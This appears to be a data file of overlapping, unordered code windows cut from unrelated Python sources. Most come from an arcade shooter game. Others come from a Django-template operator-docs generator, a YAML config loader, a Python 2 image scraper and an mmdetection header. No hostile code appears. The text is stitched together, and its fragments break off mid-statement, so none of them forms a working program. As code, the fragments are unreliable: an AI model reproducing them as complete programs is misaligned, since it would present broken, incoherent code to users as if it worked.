"if enemy.enemy_cur_health <= 0: # enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not dead",
"3: for i in range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\",",
"if it hit a enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it did,",
"self.bullet_list = None # Set up the player self.player_sprite = None self.enemy_health =",
"self.enemy_list) # If it did, get rid of the bullet if len(hit_list) >",
"= HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width),",
"False self.down_pressed = False self.width = SCREEN_WIDTH # Background image will be stored",
"or bullet.left > self.width: bullet.remove_from_sprite_lists() def main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\")",
"on health health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 *",
"if self.window.level >= 0 and self.window.level <= 3: for i in range(self.amount_of_enemies): #",
"in range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) #",
"elif self.window.level > 3 and self.window.level < 6: for i in range(self.amount_of_enemies): #",
"# Check health if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over) arcade.run()",
"it. if bullet.bottom > self.width or bullet.top < 0 or bullet.right < 0",
"on_update(self, delta_time): \"\"\" Movement and game logic \"\"\" self.player_sprite.change_x = 0 self.player_sprite.change_y =",
"-= 1 # Check health if enemy.enemy_cur_health <= 0: # enemy dead enemy.remove_from_sprite_lists()",
"= arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed =",
"arcade.draw_text(\"Click ESCAPE to return to Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def",
"= True elif key == arcade.key.RIGHT: self.right_pressed = True def on_key_release(self, key, modifiers):",
"# Draw how many health the enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x =",
"self.up_pressed = False elif key == arcade.key.DOWN: self.down_pressed = False elif key ==",
"view \"\"\" if key == arcade.key.ESCAPE: menu_view = MenuView() self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\"",
"== 0: self.level = self.updated_level + 1 else: self.good = False else: for",
"self.change_angle def follow_sprite(self, player_sprite): # This tells the enemies to go to the",
"befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw all the",
"process for enemy in hit_list: # Make sure this is the right sprite",
"# arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12, #",
"the parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables that will hold",
"enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update",
"arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED)",
"to the lists self.enemy_list.append(enemy) if self.enemy_list == 0: self.window.level = self.updated_level + 1",
"self.amount_of_enemies = 5 self.speed = SPRITE_SPEED # Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound",
"Add the enemy to the lists self.enemy_list.append(enemy) if self.enemy_list == 0: self.window.level =",
"in player_hit: # Make sure this is the right sprite if not isinstance(player,",
"enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to",
"self.enemy_health2 = 5 self.enemy_health3 = 10 self.good = True self.window.level = 1 self.updated_level",
"self.player_sprite.change_y = 0 if self.up_pressed and not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed",
"self.player_sprite.change_x = 0 self.player_sprite.change_y = 0 if self.up_pressed and not self.down_pressed: self.player_sprite.change_y =",
"start_x bullet.center_y = start_y # Get from the mouse the destination location for",
"into account the angle, calculate our change_x # and change_y. Velocity is how",
"Check health if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over) arcade.run() #",
"= arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key, modifiers): \"\"\"Called whenever a key is pressed. \"\"\"",
"5 self.enemy_health3 = 10 self.good = True self.window.level = 1 self.updated_level = -1",
"= -MOVEMENT_SPEED elif self.right_pressed and not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for enemy",
"= self.updated_level + 1 else: self.good = False else: for i in range(self.amount_of_enemies):",
"self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels() # Set the background color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\")",
"range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position",
"arcade.color.RED, 15) start_x = 360 start_y = 210 arcade.draw_text(\"Click to Shoot\", start_x, start_y,",
"start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y",
"# Set up the game # Sprite lists self.window.level = 1 self.player_list =",
"scale, enemy_max_health): super().__init__(image, scale) # Add extra attributes for health self.enemy_max_health = enemy_max_health",
"level: {self.window.level}\", start_x, start_y, arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE to return to Main Menu.\\n\",",
"to the 'game' view. \"\"\" game_view = MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View):",
"start_y angle = math.atan2(y_diff, x_diff) # Taking into account the angle, calculate our",
"15) for player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar()",
"start_x = 208 start_y = 270 arcade.draw_text(\"Use the arrow keys on your keyboard",
"* (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width), center_y=self.center_y -",
"start_x, start_y, arcade.color.RED, 15) start_x = 310 start_y = 240 arcade.draw_text(\"Use your mouse",
"- 0.5 * (HEALTHBAR_WIDTH - health_width), start_y , width=health_width + 10, height=HEALTHBAR_HEIGHT +",
"= arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed =",
"+= .20 arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit)",
"> 0: enemy.remove_from_sprite_lists() for player in player_hit: # Make sure this is the",
"arcade.key.DOWN: self.down_pressed = True elif key == arcade.key.LEFT: self.left_pressed = True elif key",
"else: self.good = False def setup(self): # Set up the game # Sprite",
"HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw",
"< 0 or bullet.left > self.width: bullet.remove_from_sprite_lists() def main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT,",
"to the lists self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\" Movement and game logic \"\"\"",
"enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the",
"def __init__(self, image, scale, player_max_health): super().__init__(image, scale) # Add extra attributes for health",
"= self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x = start_x bullet.center_y = start_y # Get",
"enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y =",
"y_diff = dest_y - start_y angle = math.atan2(y_diff, x_diff) # Taking into account",
"= True self.levels() self.amount_of_enemies += 2 #self.enemy_health += 1 self.speed += .20 arcade.play_sound(self.newLevel_sound)",
"PLAYER): raise TypeError(\"List contents must be all ints\") # Remove one health point",
"key is pressed. \"\"\" if key == arcade.key.UP: self.up_pressed = True elif key",
"# Remove one health point player.player_cur_health -= 1 # Check health if player.player_cur_health",
"== arcade.key.RIGHT: self.right_pressed = True def on_key_release(self, key, modifiers): \"\"\"Called when the user",
"SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y =",
"drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw all the sprites self.enemy_list.draw()",
"the bullet to the lists self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\" Movement and game",
"self.bottom = 0 elif self.top > SCREEN_HEIGHT - 1: self.top = SCREEN_HEIGHT -",
"= random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH)",
"through each bullet for bullet in self.bullet_list: # Check this bullet to see",
"width based on health health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x -",
"enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position the enemy enemy.center_x =",
"if len(hit_list) > 0: bullet.remove_from_sprite_lists() # For every enemy we hit, process for",
"will hold sprite lists self.player_list = None self.enemy_list = None self.bullet_list = None",
"# game = MyGame() # game.setup() # arcade.run() if __name__ == \"__main__\": main()",
"elif self.right > SCREEN_WIDTH - 1: self.right = SCREEN_WIDTH - 1 # Make",
"True self.window.level = 1 self.updated_level = -1 self.amount_of_enemies = 5 self.speed = SPRITE_SPEED",
"self.center_y - player_sprite.center_y) if self.center_x < player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x)",
"-25 MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite): def __init__(self, image, scale, player_max_health): super().__init__(image, scale)",
"super().__init__(image, scale) # Add extra attributes for health self.player_max_health = player_max_health self.player_cur_health =",
"= True elif key == arcade.key.LEFT: self.left_pressed = True elif key == arcade.key.RIGHT:",
"hits escape, go back to the main menu view \"\"\" if key ==",
"HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y,",
"elif self.down_pressed and not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed and not self.right_pressed:",
"self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\" Movement and game logic \"\"\" self.player_sprite.change_x = 0",
"account the angle, calculate our change_x # and change_y. Velocity is how fast",
"fast the bullet travels. bullet.change_x = math.cos(angle) * BULLET_SPEED bullet.change_y = math.sin(angle) *",
"start_y = self.player_sprite.center_y bullet.center_x = start_x bullet.center_y = start_y # Get from the",
"hold sprite lists self.player_list = None self.enemy_list = None self.bullet_list = None #",
"have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y = 40 arcade.draw_text(health_string, start_x +",
"on_show(self): \"\"\" Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw",
"start_x = 120 start_y = 35 if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X,",
"this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the game over view \"\"\" arcade.start_render()",
"None self.enemy_list = None self.bullet_list = None # Set up the player self.player_sprite",
"if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60,",
"= -MOVEMENT_SPEED if self.left_pressed and not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed and",
"-MOVEMENT_SPEED if self.left_pressed and not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed and not",
"Make sure this is the right sprite if not isinstance(enemy, ENEMY): raise TypeError(\"List",
"have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE)",
"escape, go back to the main menu view \"\"\" if key == arcade.key.ESCAPE:",
"(HEALTHBAR_WIDTH - health_width), start_y , width=health_width + 10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def",
"= random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists",
"width based on health start_x = 85 start_y = 25 health_width = (HEALTHBAR_WIDTH",
"dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not dead arcade.play_sound(self.hit_sound) # If the bullet flies",
"for health self.player_max_health = player_max_health self.player_cur_health = player_max_health def player_draw_health_number(self): # Draw how",
"# render the screen befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background)",
"self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output = f\"Level: {self.window.level}\" arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15) for",
"SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self, key, _modifiers): \"\"\" If user hits",
"be all ints\") # Remove one health point player.player_cur_health -= 1 # Check",
"is the right sprite if not isinstance(player, PLAYER): raise TypeError(\"List contents must be",
"def levels(self): while self.good: if self.window.level >= 0 and self.window.level <= 3: for",
"self.center_x - player_sprite.center_x) def __init__(self, image, scale, enemy_max_health): super().__init__(image, scale) # Add extra",
"SCREEN_WIDTH # Background image will be stored in this variable self.background = None",
"Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound =",
"arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y",
"bullet to the lists self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\" Movement and game logic",
"of the bullet if len(hit_list) > 0: bullet.remove_from_sprite_lists() # For every enemy we",
", width=health_width + 10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def update(self): \"\"\" Move the",
"self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed = False self.up_pressed",
"= random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the",
"10 self.good = True self.window.level = 1 self.updated_level = -1 self.amount_of_enemies = 5",
"0 and self.window.level <= 3: for i in range(self.amount_of_enemies): # Create the enemy",
"class MenuView(arcade.View): \"\"\" Class that manages the 'menu' view. \"\"\" def on_show(self): \"\"\""
] |
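Of the recoverable pieces, the proportional health bar is the clearest technique: scale the bar's width by the health fraction, then shift its center left by half the missing width so it stays anchored at its left edge. A minimal sketch, assuming the arcade 2.x drawing API; the class name, attribute names, and constant values are simplified placeholders for the originals:

import arcade

# Placeholder values; the fragments name the constants but not the numbers.
HEALTHBAR_WIDTH = 25
HEALTHBAR_HEIGHT = 3
HEALTHBAR_OFFSET_Y = -10


class Enemy(arcade.Sprite):
    def __init__(self, image, scale, max_health):
        super().__init__(image, scale)
        # Extra attributes for health, as in the recovered fragments.
        self.max_health = max_health
        self.cur_health = max_health

    def draw_health_bar(self):
        # Draw the red background bar only once the enemy has taken damage.
        if self.cur_health < self.max_health:
            arcade.draw_rectangle_filled(self.center_x,
                                         self.center_y + HEALTHBAR_OFFSET_Y,
                                         HEALTHBAR_WIDTH, HEALTHBAR_HEIGHT,
                                         arcade.color.RED)
        # Green bar scaled to the current health fraction; shifting the center
        # left by half the missing width keeps the left edge fixed.
        health_width = HEALTHBAR_WIDTH * (self.cur_health / self.max_health)
        arcade.draw_rectangle_filled(self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width),
                                     self.center_y + HEALTHBAR_OFFSET_Y,
                                     health_width, HEALTHBAR_HEIGHT,
                                     arcade.color.GREEN)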
(The next row's windows tile a second source file end to end: a Python 2 script that renders an operators.json API description into operators.html pages with Django templates. Merged and deduplicated, the underlying file is:)

import json
import os
import re
import codecs

from bs4 import BeautifulSoup
from django.template import Template, Context
import markdown

from deploy.utils import reserve_formulas, MARKDOWN_EXTENSIONS

# Django template for one operator: a heading, the rendered comment, and a
# field table of inputs, outputs, and (optional) attributes.
OPERATOR_TEMPLATE = (
    '<div class="section" id="{{ type }}">'
    '<h2>{{ type }}</h2>'
    '<dl class="function"><dd>{{ comment|safe }}'
    '<table class="docutils field-list">'
    '<colgroup><col class="field-name"><col class="field-body"></colgroup>'
    '<tbody valign="top">'
    '<tr class="field-odd field">'
    '<th class="field-name">Inputs:</th>'
    '<td class="field-body"><ul class="first simple">'
    '{% for input in inputs %}<li><strong>{{ input.name }}</strong> '
    '{% if input.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}'
    '{% if input.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: '
    '{{ input.comment }}</li>{% endfor %}</ul></td>'
    '</tr>'
    '<tr class="field-even field"><th class="field-name">Outputs:</th>'
    '<td class="field-body"><ul class="first simple">'
    '{% for output in outputs %}<li><strong>{{ output.name }}</strong> '
    '{% if output.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}'
    '{% if output.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: '
    '{{ output.comment }}</li>{% endfor %}</ul></td>'
    '</tr>'
    '{% if attrs|length_is:"0" %}{% else %}'
    '<tr class="field-odd field"><th class="field-name">Attributes:</th>'
    '<td class="field-body"><ul class="first simple">'
    '{% for attr in attrs %}<li><strong>{{ attr.name }}</strong> (<em>Duplicable</em>)'
    '{% if attr.generated == 1 %} (<em>Generated</em>) {% endif %}: '
    '{{ attr.comment }}</li>{% endfor %}</ul></td>'
    '</tr>{% endif %}'
    '</tbody>'
    '</table></dd>'
    '</dl>'
    '</div>')

# Opening and closing HTML that wrap all rendered operators on the page.
OPERATORS_WRAPPER = (
    '<div class="document">{% verbatim %}<h1>Operators</h1><div class="section" id="operators">',
    '</div>{% endverbatim %}</div>')

OPERATORS_JSON_PATH_TEMPLATE = '%s/en/html/operators.json'


def generate_operators_docs_with_generated_doc_dir(generated_docs_dir, output_dir_name):
    try:
        operators_json_path = OPERATORS_JSON_PATH_TEMPLATE % (generated_docs_dir)
        if not os.path.exists(operators_json_path):
            raise Exception('operators.json does not exist in %s' % operators_json_path)
        generate_operators_page_with_path(operators_json_path, generated_docs_dir)
    except Exception, e:
        print 'Failed to build operator docs because: ', e


def generate_operators_page_with_path(operators_api_path, destination_dir):
    try:
        # Open the operators API file.
        with open(operators_api_path) as raw_operators_api_file:
            raw_operators_api = raw_operators_api_file.read()
            generate_operators_page(raw_operators_api, destination_dir,
                                    ['en/html', 'cn/html'])
    except Exception, e:
        print 'Failed to build operator docs because: ', e


def generate_operators_page(raw_operators_api, destination_dir, lang_dirs):
    operators_output = ''
    try:
        operators = clean_json_string(raw_operators_api)

        # Go through all the operators and construct a new HTML object.
        operator_template = Template(OPERATOR_TEMPLATE)
        operators_output += OPERATORS_WRAPPER[0]
        for operator in operators:
            if 'comment' in operator:
                # Protect $$...$$ formulas from the Markdown pass, render the
                # comment, then substitute the formulas back into the HTML.
                formula_map = {}
                comment = reserve_formulas(operator['comment'], formula_map,
                                           only_reserve_double_dollar=True)
                comment = markdown.markdown(comment, extensions=MARKDOWN_EXTENSIONS)
                if 'markdown-equation' in comment:
                    soup = BeautifulSoup('<p>' + comment + '</p>', 'lxml')
                    markdown_equation_placeholders = soup.select('.markdown-equation')
                    for equation in markdown_equation_placeholders:
                        equation.string = formula_map[equation.get('id')]
                    # Strip the <body>/</body> tags lxml wraps around the fragment.
                    comment = unicode(str(soup.select('body')[0])[6:-7], 'utf-8')
                operator['comment'] = comment
            operators_output += operator_template.render(Context(operator))
        operators_output += OPERATORS_WRAPPER[1]

        for lang in lang_dirs:
            operators_output_path = '%s/%s/operators.html' % (destination_dir, lang)
            print 'Saving operators.html to %s' % operators_output_path
            if not os.path.exists(os.path.dirname(operators_output_path)):
                os.makedirs(os.path.dirname(operators_output_path))
            with codecs.open(operators_output_path, 'w', 'utf-8') as operators_output_file:
                operators_output_file.write(operators_output)
    except Exception, e:
        print 'Failed to build operator docs because: ', e


def clean_json_string(body):
    """
    Takes in a string meant to be interpreted as a JSON object, and removes
    faulty characters, recursively.
    """
    try:
        return json.loads(body)
    except ValueError, e:
        if str(e).startswith('Invalid control character'):
            faulty_character_index = int(re.search(
                'char (?P<column>\d+)', str(e)).group('column'))
            return clean_json_string(
                body[:faulty_character_index] + body[faulty_character_index + 1:])
"{} comment = reserve_formulas(operator['comment'], formula_map, only_reserve_double_dollar=True) comment = markdown.markdown(comment, extensions=MARKDOWN_EXTENSIONS) #if len(operator_comment_line) >",
"object, and removes faulty characters, recursively. \"\"\" try: return json.loads(body) except ValueError, e:",
"%}(<em>Intermediate</em>) {% endif %}: {{ input.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>') +",
"{% if output.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if output.intermediate == 1",
"verbatim %}<h1>Operators</h1><div class=\"section\" id=\"operators\">', '</div>{% endverbatim %}</div>' ) OPERATORS_JSON_PATH_TEMPLATE = '%s/en/html/operators.json' def generate_operators_docs_with_generated_doc_dir(generated_docs_dir,",
"docs because: ', e def generate_operators_page(raw_operators_api, destination_dir, lang_dirs): operators_output = '' try: operators",
"%}{% if input.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{ input.comment }}</li>{% endfor",
"operator docs because: ', e def generate_operators_page(raw_operators_api, destination_dir, lang_dirs): operators_output = '' try:",
"lang_dirs: operators_output_path = '%s/%s/operators.html' % (destination_dir, lang) print 'Saving operators.html to %s' %",
"e def generate_operators_page(raw_operators_api, destination_dir, lang_dirs): operators_output = '' try: operators = clean_json_string(raw_operators_api) #",
"and construct a new HTML object. operator_template = Template(OPERATOR_TEMPLATE) operators_output += OPERATORS_WRAPPER[0] for",
"+ ( '</tr>{% endif %}') + ( '</tbody>') + ( '</table></dd>') + (",
"docs because: ', e def clean_json_string(body): \"\"\" Takes in a string meant to",
"class=\"section\" id=\"operators\">', '</div>{% endverbatim %}</div>' ) OPERATORS_JSON_PATH_TEMPLATE = '%s/en/html/operators.json' def generate_operators_docs_with_generated_doc_dir(generated_docs_dir, output_dir_name): try:",
"+ ( '<h2>{{ type }}</h2>') + ( '<dl class=\"function\"><dd>{{ comment|safe }}') + (",
"operators_output_file: operators_output_file.write(operators_output) except Exception, e: print 'Failed to build operator docs because: ',",
"outputs %}<li><strong>{{ output.name }}</strong> {% if output.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{%",
"try: # Open the operators API file. with open(operators_api_path) as raw_operators_api_file: raw_operators_api =",
"equation.string = formula_map[equation.get('id')] comment = unicode( str(soup.select('body')[0])[6:-7], 'utf-8' ) operator['comment'] = comment operators_output",
"+ ( '<td class=\"field-body\"><ul class=\"first simple\">{% for attr in attrs %}<li><strong>{{ attr.name }}</strong>",
"+ ( '</div>') OPERATORS_WRAPPER = ( '<div class=\"document\">{% verbatim %}<h1>Operators</h1><div class=\"section\" id=\"operators\">', '</div>{%",
"raw_operators_api_file: raw_operators_api = raw_operators_api_file.read() generate_operators_page(raw_operators_api, destination_dir, ['en/html', 'cn/html']) except Exception, e: print 'Failed",
"OPERATORS_WRAPPER[0] for operator in operators: if 'comment' in operator: formula_map = {} comment",
"( '<colgroup><col class=\"field-name\"><col class=\"field-body\"></colgroup>') + ( '<tbody valign=\"top\">') + ( '<tr class=\"field-odd field\">')",
"BeautifulSoup('<p>' + comment + '</p>', 'lxml') markdown_equation_placeholders = soup.select('.markdown-equation') for equation in markdown_equation_placeholders:",
"+= OPERATORS_WRAPPER[1] for lang in lang_dirs: operators_output_path = '%s/%s/operators.html' % (destination_dir, lang) print",
"}}</strong> {% if output.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if output.intermediate =="
] |
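# clean_json_string recovers from json.loads failures by reading the offending
# character offset out of the ValueError message, deleting that character, and
# retrying until the string parses. A minimal, self-contained Python 3 sketch
# of the same recursion (the Python 3 except-syntax, the re-raise for other
# errors, and the sample input are mine, not the original's):
import json
import re

def strip_bad_control_chars(body):
    """Recursively drop invalid control characters until `body` parses as JSON."""
    try:
        return json.loads(body)
    except ValueError as e:
        if str(e).startswith('Invalid control character'):
            # json reports the offset, e.g. "... at: line 1 column 16 (char 15)".
            column = int(re.search(r'char (?P<column>\d+)', str(e)).group('column'))
            return strip_bad_control_chars(body[:column] + body[column + 1:])
        raise

# A raw tab inside a JSON string is rejected by json.loads; one pass removes it.
print(strip_bad_control_chars('{"comment": "a\tb"}'))  # {'comment': 'ab'}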
# Cluster configuration loader: YAML files are shipped as package resources;
# per-environment overrides from context.yml are layered on top and cached.
import yaml
from pkg_resources import resource_stream


def load(filename):
    with resource_stream(__name__, filename) as config_file:
        # NOTE: on modern PyYAML, prefer yaml.safe_load here to avoid
        # arbitrary object construction from untrusted files.
        return yaml.load(config_file)


def load_cluster_config(name):
    return load('{0}.yml'.format(name))


_env = load('context.yml')
_configs = {}


def get_config(env):
    if env not in _configs:
        _configs[env] = load_cluster_config(get_cluster_name(env))
        _configs[env].update(_env[env].get("override", {}))
    return _configs[env]


def get_cluster_name(env):
    return _env[env]["cluster"]
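# get_config lazily loads one YAML file per cluster, memoises it in _configs,
# and layers the environment's "override" mapping from context.yml on top, so
# repeat calls are plain dict lookups. A self-contained rehearsal of that
# lookup-then-override merge with the YAML files replaced by in-memory dicts
# (all names and values below are illustrative, not from the original):
_env = {"prod": {"cluster": "east", "override": {"workers": 16}}}
_cluster_files = {"east": {"workers": 4, "region": "us-east-1"}}
_configs = {}

def demo_get_config(env):
    if env not in _configs:
        _configs[env] = dict(_cluster_files[_env[env]["cluster"]])
        _configs[env].update(_env[env].get("override", {}))
    return _configs[env]

print(demo_get_config("prod"))  # {'workers': 16, 'region': 'us-east-1'}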
# Python 2 image scraper: getImg lists the <img> sources on a page,
# downloadImg fetches one image unless it is already on disk.
import requests, urllib, urllib2, os
from bs4 import BeautifulSoup
import style


def getImg(url):
    response = requests.get(url)
    soup = BeautifulSoup(response.text, 'lxml')
    imgs = soup.find_all('img')
    for img in imgs:
        print(img.get('src'))


def downloadImg(imgUrl, targetUrl):
    arr = imgUrl.split('/')
    fileName = arr[len(arr) - 1]
    if not os.path.exists(targetUrl + fileName):
        output = open(targetUrl + fileName, 'wb+')
        imgData = urllib2.urlopen(imgUrl).read()
        output.write(imgData)
        output.close()
        print style.use_style('[info] ', mode='bold', fore='green') + \
            style.use_style(fileName, fore='cyan') + ' is downloaded.'
    else:
        print style.use_style('[warning] ', mode='bold', fore='red') + \
            style.use_style(fileName, fore='purple') + ' is here!'


downloadImg('http://posters.imdb.cn/ren-pp/0000701/CjR3AsiaP_1190290948.jpg',
            '/Users/zhengmeiyu/Downloads/')
getImg('http://22mm.xiuna.com/mm/qingliang/')
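# The scraper mixes requests (for the listing page) with urllib2 (for the image
# bytes) and only runs on Python 2. A hedged Python 3 re-sketch of downloadImg
# using requests alone and os.path.join instead of string concatenation
# (function and variable names here are mine):
import os
import requests

def download_img(img_url, target_dir):
    """Save img_url into target_dir, skipping files that already exist."""
    file_name = img_url.rsplit('/', 1)[-1]
    target_path = os.path.join(target_dir, file_name)
    if os.path.exists(target_path):
        print('[warning] %s is here!' % file_name)
        return
    img_data = requests.get(img_url).content
    with open(target_path, 'wb') as output:
        output.write(img_data)
    print('[info] %s is downloaded.' % file_name)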
# Faster R-CNN inference driver for mmdetection: loads a trained checkpoint,
# runs detection on one image, and writes the visualised result next to it.
import sys
from myutils import my_config
